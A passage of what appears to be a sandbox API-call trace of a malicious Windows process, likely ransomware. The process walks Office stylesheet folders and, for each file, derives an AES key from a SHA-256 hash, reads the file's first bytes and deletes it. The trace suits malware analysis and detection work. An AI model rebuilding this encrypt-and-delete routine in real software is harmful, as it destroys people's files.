lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BUTTON.GIF", lpUsedDefaultChar=0x0) returned 11 [0160.526] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_OFF.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_OFF.GIF", lpUsedDefaultChar=0x0) returned 12 [0160.526] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_ON.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_ON.GIF", lpUsedDefaultChar=0x0) returned 11 [0160.526] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 0 [0160.526] FindClose (in: hFindFile=0x284d5e8 | out: hFindFile=0x284d5e8) returned 1 [0160.526] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BrightOrange.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BrightOrange.css", lpUsedDefaultChar=0x0) returned 17 [0160.527] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.527] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.527] CryptHashData (hHash=0x284d5e8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.527] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0160.527] GetFileSize (in: hFile=0x4cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc3c [0160.527] ReadFile (in: hFile=0x4cc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.560] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0160.560] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0160.560] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.561] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightOrange.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\brightorange.css")) returned 1 [0160.562] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.563] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.563] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.563] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HEADER.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HEADER.GIF", lpUsedDefaultChar=0x0) returned 11 [0160.563] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_OFF.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_OFF.GIF", lpUsedDefaultChar=0x0) returned 12 [0160.563] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_ON.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_ON.GIF", lpUsedDefaultChar=0x0) returned 11 [0160.563] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 0 [0160.563] FindClose (in: hFindFile=0x284d668 | out: hFindFile=0x284d668) returned 1 [0160.563] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BrightYellow.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BrightYellow.css", lpUsedDefaultChar=0x0) returned 17 [0160.563] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.564] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.564] CryptHashData (hHash=0x284d668, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.564] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0160.564] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd03 [0160.564] ReadFile (in: hFile=0x4d0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.573] CryptDestroyHash (hHash=0x284d668) returned 1 [0160.573] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0160.573] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.574] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightYellow.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\brightyellow.css")) returned 1 [0160.575] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Casual.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Casual.css", lpUsedDefaultChar=0x0) returned 11 [0160.576] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.576] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.576] CryptHashData (hHash=0x284d5e8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.576] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0160.576] GetFileSize (in: hFile=0x4cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x766 [0160.576] ReadFile (in: hFile=0x4cc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.587] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0160.587] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0160.587] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.589] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Casual.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\casual.css")) returned 1 [0160.590] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.590] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.590] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.591] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HEADER.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HEADER.GIF", lpUsedDefaultChar=0x0) returned 11 [0160.591] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_OFF.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_OFF.GIF", lpUsedDefaultChar=0x0) returned 12 [0160.591] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_ON.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_ON.GIF", lpUsedDefaultChar=0x0) returned 11 [0160.591] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 0 [0160.591] FindClose (in: hFindFile=0x284d668 | out: hFindFile=0x284d668) returned 1 [0160.591] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Desert.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Desert.css", lpUsedDefaultChar=0x0) returned 11 [0160.591] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.592] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.592] CryptHashData (hHash=0x284d668, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.592] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0160.592] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb0e [0160.592] ReadFile (in: hFile=0x4d0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.606] CryptDestroyHash (hHash=0x284d668) returned 1 [0160.606] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0160.606] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.607] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Desert.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\desert.css")) returned 1 [0160.608] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Discussion.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Discussion.css", lpUsedDefaultChar=0x0) returned 15 [0160.608] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.609] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.609] CryptHashData (hHash=0x284d5e8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.609] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0160.609] GetFileSize (in: hFile=0x4cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x173 [0160.609] ReadFile (in: hFile=0x4cc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.610] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0160.610] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0160.610] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.611] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Discussion.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\discussion.css")) returned 1 [0160.612] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Earthy.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Earthy.css", lpUsedDefaultChar=0x0) returned 11 [0160.613] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.613] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.613] CryptHashData (hHash=0x284d668, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.613] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0160.613] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x71e [0160.613] ReadFile (in: hFile=0x4d0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.627] CryptDestroyHash (hHash=0x284d668) returned 1 [0160.627] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0160.627] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.629] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Earthy.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\earthy.css")) returned 1 [0160.630] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.631] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.631] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.631] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HEADER.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HEADER.GIF", lpUsedDefaultChar=0x0) returned 11 [0160.631] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_OFF.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_OFF.GIF", lpUsedDefaultChar=0x0) returned 12 [0160.631] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_ON.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_ON.GIF", lpUsedDefaultChar=0x0) returned 11 [0160.631] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 0 [0160.631] FindClose (in: hFindFile=0x284d5e8 | out: hFindFile=0x284d5e8) returned 1 [0160.631] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GrayCheck.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrayCheck.css", lpUsedDefaultChar=0x0) returned 14 [0160.632] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.632] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.632] CryptHashData (hHash=0x284d5e8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.632] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0160.632] GetFileSize (in: hFile=0x4cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbea [0160.632] ReadFile (in: hFile=0x4cc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.642] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0160.642] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0160.642] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.643] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\GrayCheck.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\graycheck.css")) returned 1 [0160.644] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GreenTea.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GreenTea.css", lpUsedDefaultChar=0x0) returned 13 [0160.644] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.645] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.645] CryptHashData (hHash=0x284d668, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.645] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0160.645] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x752 [0160.645] ReadFile (in: hFile=0x4d0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.647] CryptDestroyHash (hHash=0x284d668) returned 1 [0160.647] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0160.647] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.648] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\GreenTea.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\greentea.css")) returned 1 [0160.649] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LightSpirit.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LightSpirit.css", lpUsedDefaultChar=0x0) returned 16 [0160.650] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.650] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.650] CryptHashData (hHash=0x284d5e8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.650] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0160.650] GetFileSize (in: hFile=0x4cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7c4 [0160.650] ReadFile (in: hFile=0x4cc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.660] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0160.660] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0160.660] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.661] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\LightSpirit.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\lightspirit.css")) returned 1 [0160.662] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.664] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.664] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.664] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_OFF.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_OFF.GIF", lpUsedDefaultChar=0x0) returned 12 [0160.664] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_ON.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_ON.GIF", lpUsedDefaultChar=0x0) returned 11 [0160.664] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 0 [0160.664] FindClose (in: hFindFile=0x284d668 | out: hFindFile=0x284d668) returned 1 [0160.664] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Lime.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lime.css", lpUsedDefaultChar=0x0) returned 9 [0160.664] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.665] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.665] CryptHashData (hHash=0x284d668, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.665] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0160.665] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd77 [0160.665] ReadFile (in: hFile=0x4d0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.672] CryptDestroyHash (hHash=0x284d668) returned 1 [0160.672] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0160.672] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.673] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Lime.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\lime.css")) returned 1 [0160.674] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Maroon.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Maroon.css", lpUsedDefaultChar=0x0) returned 11 